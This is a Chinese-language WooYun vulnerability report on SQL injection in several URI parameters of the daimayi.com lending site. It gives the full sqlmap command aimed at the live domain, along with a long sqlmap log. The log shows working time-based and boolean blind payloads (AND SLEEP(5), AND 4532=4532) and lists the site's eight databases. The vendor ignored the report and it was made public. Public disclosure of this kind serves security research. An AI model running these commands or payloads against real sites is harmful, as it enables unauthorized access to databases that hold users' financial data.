当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151941

漏洞标题:贷蚂蚁主站多个参数存在SQL注入漏洞(DBA权限)

相关厂商:daimayi.com

漏洞作者: 路人甲

提交时间:2015-11-05 08:54

修复时间:2015-11-10 08:56

公开时间:2015-11-10 08:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我搜索了,这些没有提交过吧,不会再来一个重复ID?没有信心提交这个网站了!~~~多个参数存在注入点!~~~

详细说明:

地址:

sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 10 --dbms "MySQL"


money、deadline、lt、co_id后面的数字存在注入
sqlmap测试

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[00:21:43] [INFO] testing connection to the target URL
[00:21:48] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[00:21:53] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[00:21:55] [INFO] testing if URI parameter '#1*' is dynamic
[00:21:59] [WARNING] URI parameter '#1*' does not appear dynamic
[00:22:04] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[00:22:04] [INFO] testing for SQL injection on URI parameter '#1*'
[00:22:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:23:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:23:58] [INFO] testing 'MySQL inline queries'
[00:24:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:02] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:24:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:31:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:37:26] [WARNING] URI parameter '#1*' is not injectable
[00:37:26] [INFO] testing if URI parameter '#2*' is dynamic
[00:37:31] [INFO] confirming that URI parameter '#2*' is dynamic
[00:37:35] [INFO] URI parameter '#2*' is dynamic
[00:37:36] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might
not be injectable
[00:37:36] [INFO] testing for SQL injection on URI parameter '#2*'
[00:37:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:37:38] [WARNING] reflective value(s) found and filtering out
[00:38:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:38:15] [INFO] testing 'MySQL inline queries'
[00:38:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:38:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:39:31] [INFO] URI parameter '#2*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[00:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:39:31] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[00:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:40:26] [INFO] checking if the injection point on URI parameter '#2*' is a fa
lse positive
URI parameter '#2*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
[00:43:18] [INFO] testing if URI parameter '#3*' is dynamic
[00:43:23] [INFO] confirming that URI parameter '#3*' is dynamic
[00:43:28] [INFO] URI parameter '#3*' is dynamic
[00:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#3*' might
not be injectable
[00:43:29] [INFO] testing for SQL injection on URI parameter '#3*'
[00:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:44:10] [INFO] testing 'MySQL inline queries'
[00:44:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:44:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:45:25] [INFO] URI parameter '#3*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[00:45:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:46:18] [INFO] checking if the injection point on URI parameter '#3*' is a fa
lse positive
URI parameter '#3*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
[00:54:38] [INFO] testing if URI parameter '#4*' is dynamic
[00:54:42] [INFO] confirming that URI parameter '#4*' is dynamic
[00:54:47] [INFO] URI parameter '#4*' is dynamic
[00:54:48] [WARNING] heuristic (basic) test shows that URI parameter '#4*' might
not be injectable
[00:54:48] [INFO] testing for SQL injection on URI parameter '#4*'
[00:54:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:08] [INFO] URI parameter '#4*' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[00:55:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:55:09] [INFO] testing 'MySQL inline queries'
[00:55:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:55:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:56:15] [INFO] URI parameter '#4*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[00:56:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#4*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
[00:58:24] [INFO] testing if URI parameter '#5*' is dynamic
[00:58:31] [INFO] confirming that URI parameter '#5*' is dynamic
[00:58:36] [INFO] URI parameter '#5*' is dynamic
[00:58:43] [WARNING] heuristic (basic) test shows that URI parameter '#5*' might
not be injectable
[00:58:43] [INFO] testing for SQL injection on URI parameter '#5*'
[00:58:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:59:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:59:56] [INFO] testing 'MySQL inline queries'
[01:00:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:00:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:01:16] [INFO] URI parameter '#5*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[01:01:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:01:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:02:09] [INFO] checking if the injection point on URI parameter '#5*' is a fa
lse positive
URI parameter '#5*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 470 HTTP(s) req
uests:
---
Place: URI
Parameter: #2*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1 AND SLEEP(5)
/deadline/3/lt/1/co_id/1
Place: URI
Parameter: #5*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/l
t/1/co_id/1 AND SLEEP(5)
Place: URI
Parameter: #4*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/l
t/1 AND 4532=4532/co_id/1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/l
t/1 AND SLEEP(5)/co_id/1
Place: URI
Parameter: #3*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3 A
ND SLEEP(5)/lt/1/co_id/1
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #3*, type: Unescaped numeric
[2] place: URI, parameter: #4*, type: Unescaped numeric
[3] place: URI, parameter: #5*, type: Unescaped numeric
[q] Quit
> 0
[01:06:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


1.jpg


2.jpg


3.jpg


available databases [8]:
[*] daimayi
[*] huomayi
[*] information_schema
[*] mayishequ
[*] mysql
[*] myxd
[*] performance_schema
[*] test


sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 1 --dbms
"MySQL" --current-db --current-user --is-dba --time-sec 60
由于是延时注入,实在太慢了,就不继续了!

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-10 08:56

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无